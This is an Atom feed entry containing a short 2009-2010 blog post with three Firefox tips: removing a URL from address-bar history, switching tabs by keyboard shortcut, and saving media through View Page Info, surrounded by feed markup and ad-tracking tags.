     var topsy_url = "http://www.hungry-hackers.com/2009/06/3-firefox-tips-you-may-not-know-about.html";
&lt;/script&gt;  &lt;script src="http://cdn.topsy.com/button.js" type="text/javascript"&gt;
&lt;/script&gt; &lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;I discovered five new Firefox tips today.  Maybe these are old hat and you  know them already. Or maybe like me, you had no idea these could be  done.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;1. &lt;b&gt;Delete visited URL’s&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
When you drop down the box underneath the address bar, you can see your  recent browsing history. But what if you want to remove one URL from that list?  Maybe you’ve been looking at a naughty site and you don’t want your girfriend to  know? Or maybe you’ve been shopping for your loved one online and you want to  keep it a secret?&lt;br /&gt;
Just drop down the URL box, highlight the URL you want to zap then press the  “delete” button on your keyboard. The URL will then be removed from the  list.&lt;br /&gt;
&lt;br /&gt;
2. &lt;b&gt;Navigate to browser tabs using the keyboard&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Instead of using the mouse to click on a tab, why not use the keyboard  instead? Pressing CTRL + TAB together will bounce you from tab to tab, starting  from the one in the far left and working its way along. Or if you want to go to  a specifc tab straight away, you can do that too. CTRL + 2 will take you  directly to the second tab from the left. CTRL + 5 will take you to the fifth  tab from the left.&lt;br /&gt;
&lt;br /&gt;
3. &lt;b&gt;Grab files off webpages, even protected webpages&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Have you ever wanted a picture, file or video off a webpage but you can’t,  because it’s been protected? Just right-click on the page, choose “View Page  Info” then the “media” tab. Find the file you’re looking for from the list and  click on “save”.&lt;br /&gt;
&lt;div style="text-align: center;"&gt;(note : this doesn’t work for everything but I have still had a  pretty high success rate nonetheless).&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-6818913894076266534?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/6f0ay-Mmv30hIJsLU2yu1cCglO8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6f0ay-Mmv30hIJsLU2yu1cCglO8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/6f0ay-Mmv30hIJsLU2yu1cCglO8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6f0ay-Mmv30hIJsLU2yu1cCglO8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/tjP6I2MWQ_o" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/6818913894076266534/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/3-firefox-tips-you-may-not-know-about.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6818913894076266534?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6818913894076266534?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/tjP6I2MWQ_o/3-firefox-tips-you-may-not-know-about.html" title="3 Firefox Tips You May Not Know About" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/3-firefox-tips-you-may-not-know-about.html</feedburner:origLink></entry></feed>

